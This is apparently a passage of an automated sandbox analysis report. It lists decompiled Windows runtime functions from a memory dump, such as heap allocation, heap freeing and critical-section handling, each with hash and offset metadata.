                                                    • Opcode Fuzzy Hash: 88dd3388776ac224568dc53a56403875eb94edc148fe5fa12bd6ff546a93ba3c
                                                    • Instruction Fuzzy Hash: 52E09272A41421ABD2115B58EC80F6B73ADEBD5755F0940B9E505C7210D639ED02C7E0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E04B4F358(void* __ecx, signed int __edx) {
                                                    				char _v8;
                                                    				signed int _t9;
                                                    				void* _t20;
                                                    
                                                    				_push(__ecx);
                                                    				_t9 = 2;
                                                    				_t20 = 0;
                                                    				if(E04B7F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                                    					_t20 = L04B64620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                    				}
                                                    				return _t20;
                                                    			}







                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                    • Instruction ID: f54549ff1b53a28cafe3462efef2fd158f16e3b27c5d2ef48e429b8330855076
                                                    • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                    • Instruction Fuzzy Hash: 40E0DF32A40118BBDF31AAD99E05FABBBACEB88B60F0101D6F904D7150D574AE00E6D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B5FF60(intOrPtr _a4) {
                                                    				void* __ecx;
                                                    				void* __ebp;
                                                    				void* _t13;
                                                    				intOrPtr _t14;
                                                    				void* _t15;
                                                    				void* _t16;
                                                    				void* _t17;
                                                    
                                                    				_t14 = _a4;
                                                    				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x4b211a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                    					return E04C188F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                                    				} else {
                                                    					return E04B60050(_t14);
                                                    				}
                                                    			}











                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5a619b0622c201325bacc664ed320b4754d4bb2e8b963c8599670737baa712f3
                                                    • Instruction ID: d8d45cb34c6d9c064f9f6c3e9b7b906fad064e719e9d2b0d81c56fbd628786b0
                                                    • Opcode Fuzzy Hash: 5a619b0622c201325bacc664ed320b4754d4bb2e8b963c8599670737baa712f3
                                                    • Instruction Fuzzy Hash: 0FE0DFB120B3049FE735EB66D360F35F79ADF42729F1980DDE8084B921C621F880DA16
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E04BD41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                    				void* _t5;
                                                    				void* _t14;
                                                    
                                                    				_push(8);
                                                    				_push(0x4c208f0);
                                                    				_t5 = E04B9D08C(__ebx, __edi, __esi);
                                                    				if( *0x4c387ec == 0) {
                                                    					E04B5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                    					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                                    					if( *0x4c387ec == 0) {
                                                    						 *0x4c387f0 = 0x4c387ec;
                                                    						 *0x4c387ec = 0x4c387ec;
                                                    						 *0x4c387e8 = 0x4c387e4;
                                                    						 *0x4c387e4 = 0x4c387e4;
                                                    					}
                                                    					 *(_t14 - 4) = 0xfffffffe;
                                                    					_t5 = L04BD4248();
                                                    				}
                                                    				return E04B9D0D1(_t5);
                                                    			}






                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 20a6cedb2c4656118900ec483452972be7453490bcd02cd1c45190bba196ce03
                                                    • Instruction ID: de089a0c32ae6e244e09ac9edd5ee5b98fb2f3bf17c3cbe7a71a69bae01523a5
                                                    • Opcode Fuzzy Hash: 20a6cedb2c4656118900ec483452972be7453490bcd02cd1c45190bba196ce03
                                                    • Instruction Fuzzy Hash: C1F0F2789207009FEBA0FFAAA50470436E6E74621AF0045AAB10486284D778B980CF31
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04BFD380(void* __ecx, void* __edx, intOrPtr _a4) {
                                                    				void* _t5;
                                                    
                                                    				if(_a4 != 0) {
                                                    					_t5 = L04B4E8B0(__ecx, _a4, 0xfff);
                                                    					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                    					return _t5;
                                                    				}
                                                    				return 0xc000000d;
                                                    			}





                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                    • Instruction ID: 950b754e321f3d8d87c55dc78759f5dd5fa9cdc260ef9581b7b8f403526fae9e
                                                    • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                    • Instruction Fuzzy Hash: A8E0C231280204BBEB226E44CC00F797B1AEB407A4F104071FF0D5A690CA79FC91E6C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B7A185() {
                                                    				void* __ecx;
                                                    				intOrPtr* _t5;
                                                    
                                                    				if( *0x4c367e4 >= 0xa) {
                                                    					if(_t5 < 0x4c36800 || _t5 >= 0x4c36900) {
                                                    						return L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                                    					} else {
                                                    						goto L1;
                                                    					}
                                                    				} else {
                                                    					L1:
                                                    					return E04B60010(0x4c367e0, _t5);
                                                    				}
                                                    			}






                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 286e4819422e55a4312e712f70c5b900a31e24984d9049fb50b961abe3c78392
                                                    • Instruction ID: 27b352b43e63c6b03725be1a9c5d3e3537a963fc67d0272e670381777669b8ef
                                                    • Opcode Fuzzy Hash: 286e4819422e55a4312e712f70c5b900a31e24984d9049fb50b961abe3c78392
                                                    • Instruction Fuzzy Hash: C7D0C7A12200003AF63C6720A854B292223EBCAB4EF2008CCE1070A9A0DA68F8E08208
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B716E0(void* __edx, void* __eflags) {
                                                    				void* __ecx;
                                                    				void* _t3;
                                                    
                                                    				_t3 = E04B71710(0x4c367e0);
                                                    				if(_t3 == 0) {
                                                    					_t6 =  *[fs:0x30];
                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                                    						goto L1;
                                                    					} else {
                                                    						return L04B64620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                                    					}
                                                    				} else {
                                                    					L1:
                                                    					return _t3;
                                                    				}
                                                    			}






                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 04990dd43bcab6bf4ff2f57ebd556630c5aa4f7a7e4024764c6eded16626eb01
                                                    • Instruction ID: b8a76ec50acb8848f33016a7b8589cdb3ac54b2691998d84df98f0d15adbacfb
                                                    • Opcode Fuzzy Hash: 04990dd43bcab6bf4ff2f57ebd556630c5aa4f7a7e4024764c6eded16626eb01
                                                    • Instruction Fuzzy Hash: 5CD0A7B120010062FA2D5B189854B152256EBC078AF3800DCF117595C0CFB4FC92E46C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04BC53CA(void* __ebx) {
                                                    				intOrPtr _t7;
                                                    				void* _t13;
                                                    				void* _t14;
                                                    				intOrPtr _t15;
                                                    				void* _t16;
                                                    
                                                    				_t13 = __ebx;
                                                    				if( *((char*)(_t16 - 0x65)) != 0) {
                                                    					E04B5EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                    					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                                                    					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                                                    				}
                                                    				if(_t15 != 0) {
                                                    					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                                                    					return  *((intOrPtr*)(_t16 - 0x64));
                                                    				}
                                                    				return _t7;
                                                    			}









                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                    • Instruction ID: 854aa97b35f5d06570bb20e5dc45c0e0dc9542b3daf2e3f3139f22ce926eab64
                                                    • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                    • Instruction Fuzzy Hash: 52E0EC71954684ABDF22DF59CA90F5EB7F5FB84B44F150498A4096B661C668FD00CB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B735A1(void* __eax, void* __ebx, void* __ecx) {
                                                    				void* _t6;
                                                    				void* _t10;
                                                    				void* _t11;
                                                    
                                                    				_t10 = __ecx;
                                                    				_t6 = __eax;
                                                    				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                                    					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                                    				}
                                                    				if( *((char*)(_t11 - 0x1a)) != 0) {
                                                    					return E04B5EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                    				}
                                                    				return _t6;
                                                    			}







                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                    • Instruction ID: e19e1aca16204b17fb6e2a88fe002a9ff182799e35661a337fb71166f5182704
                                                    • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                    • Instruction Fuzzy Hash: C4D0A9315011809AEB01AF10C21876C73F2FB00308F5830E98C1206862C33EAA0AF600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B5AAB0() {
                                                    				intOrPtr* _t4;
                                                    
                                                    				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                    				if(_t4 != 0) {
                                                    					if( *_t4 == 0) {
                                                    						goto L1;
                                                    					} else {
                                                    						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                                    					}
                                                    				} else {
                                                    					L1:
                                                    					return 0x7ffe0030;
                                                    				}
                                                    			}





                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                    • Instruction ID: 771f9dfa271a89d5cd4e7d23945dc38430e177ff8d69e0fbaa612dde99addf23
                                                    • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                    • Instruction Fuzzy Hash: 1ED0C235252A80CFD6169B1DC564B1573A4FB48B44FC505D0E901CBA61E628E955CA10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04BCA537(intOrPtr _a4, intOrPtr _a8) {
                                                    
                                                    				return L04B68E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                                    			}



                                                    0x04bca553

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                    • Instruction ID: 1cda7b584e82083db91f192f55c33c4c64066a4007423fcbaba4158f5a0d196a
                                                    • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                    • Instruction Fuzzy Hash: 5CC01232080248BBCB126E81CC00F067B2AEB94B60F008410BA480A5608636E970EA84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B4DB40() {
                                                    				signed int* _t3;
                                                    				void* _t5;
                                                    
                                                    				_t3 = L04B64620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                                    				if(_t3 == 0) {
                                                    					return 0;
                                                    				} else {
                                                    					 *_t3 =  *_t3 | 0x00000400;
                                                    					return _t3;
                                                    				}
                                                    			}






                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                    • Instruction ID: 0f572d00ac53375df201efc0c9b1e5273a4858c784e1d843968e0b5f1e729dd0
                                                    • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                    • Instruction Fuzzy Hash: 84C08C30280A00AAEB221F20CD11B0136A4FB41B09F4400E0A301DA0F0DB7CE801EA00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B4AD30(intOrPtr _a4) {
                                                    
                                                    				return L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                    			}



                                                    0x04b4ad49

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                    • Instruction ID: d10b77ce1cf150511aaed83374c6f71821479dd8f6babbd43e036c6cf6cc8d1b
                                                    • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                    • Instruction Fuzzy Hash: 31C08C32080248BBC7126A45CD00F117B29E790B60F000020B6080A661893AE860D588
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B576E2(void* __ecx) {
                                                    				void* _t5;
                                                    
                                                    				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                                    					return L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                    				}
                                                    				return _t5;
                                                    			}





                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                    • Instruction ID: 16646d07f500903a5f57a0b52fa4d065f8858f82896b2ec16e79428111515454
                                                    • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                    • Instruction Fuzzy Hash: 62C08C702511C05AEB2A6B08CE20B307650EB0870CF4801DCAE06094B1CB6CB802C288
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B736CC(void* __ecx) {
                                                    
                                                    				if(__ecx > 0x7fffffff) {
                                                    					return 0;
                                                    				} else {
                                                    					return L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                    				}
                                                    			}




                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                    • Instruction ID: 59b9c0b75956594f4c2348d6bf0dffd7061e6431a64ee18503fbcdc33889634d
                                                    • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                    • Instruction Fuzzy Hash: 81C04C75195840AAE6155B208D51B157294F741A65F6406D47221495E0D569AC00E504
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B63A1C(intOrPtr _a4) {
                                                    				void* _t5;
                                                    
                                                    				return L04B64620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                    			}




                                                    0x04b63a35

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                    • Instruction ID: 9b309939e33f3cd851c61882f62dd19c9d509ad985ad3455e8464d371686fa31
                                                    • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                    • Instruction Fuzzy Hash: 7EC08C32080648BBC7126E41DC00F027B29E790B60F000060B6040A5608536EC60D98C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B67D50() {
                                                    				intOrPtr* _t3;
                                                    
                                                    				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                    				if(_t3 != 0) {
                                                    					return  *_t3;
                                                    				} else {
                                                    					return _t3;
                                                    				}
                                                    			}





                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                    • Instruction ID: ea66f222cdf0664df8c54bc1a391fc4e215ccb4436e1b970e5201883f6ef18a7
                                                    • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                    • Instruction Fuzzy Hash: 0DB092343019408FDF16DF18C080B1533E4FB44A44B8404D0E401CBA20D629E8009900
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B72ACB() {
                                                    				void* _t5;
                                                    
                                                    				return E04B5EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                    			}




                                                    0x04b72adc

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                    • Instruction ID: 84ec2fee824c2b5710615c68f74594a85f49c27fa60118d92b250daa64efbfb0
                                                    • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                    • Instruction Fuzzy Hash: 94B092328104408BCF02AF40C650B19B331AB00650F0544909401279308228AD01CA40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 53%
                                                    			E04BDFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                    				void* _t7;
                                                    				intOrPtr _t9;
                                                    				intOrPtr _t10;
                                                    				intOrPtr* _t12;
                                                    				intOrPtr* _t13;
                                                    				intOrPtr _t14;
                                                    				intOrPtr* _t15;
                                                    
                                                    				_t13 = __edx;
                                                    				_push(_a4);
                                                    				_t14 =  *[fs:0x18];
                                                    				_t15 = _t12;
                                                    				_t7 = E04B8CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                    				_push(_t13);
                                                    				E04BD5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                    				_t9 =  *_t15;
                                                    				if(_t9 == 0xffffffff) {
                                                    					_t10 = 0;
                                                    				} else {
                                                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                    				}
                                                    				_push(_t10);
                                                    				_push(_t15);
                                                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                    				return E04BD5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                    			}











                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04BDFDFA
                                                    Strings
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04BDFE2B
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04BDFE01
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                    • API String ID: 885266447-3903918235
                                                    • Opcode ID: c88ab69d46eabd568ee91bd2acea43b7b123d3bc66b8a3c7f0180864c90746c7
                                                    • Instruction ID: 025c21164d4e7237615bed85883c0044e411a8d89b04ebcfbfedece973536ad5
                                                    • Opcode Fuzzy Hash: c88ab69d46eabd568ee91bd2acea43b7b123d3bc66b8a3c7f0180864c90746c7
                                                    • Instruction Fuzzy Hash: 8FF0CD72204201BBEA241A46DC02F23BB6AEB44B31F2442D4F628561E1EA62F82096B4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%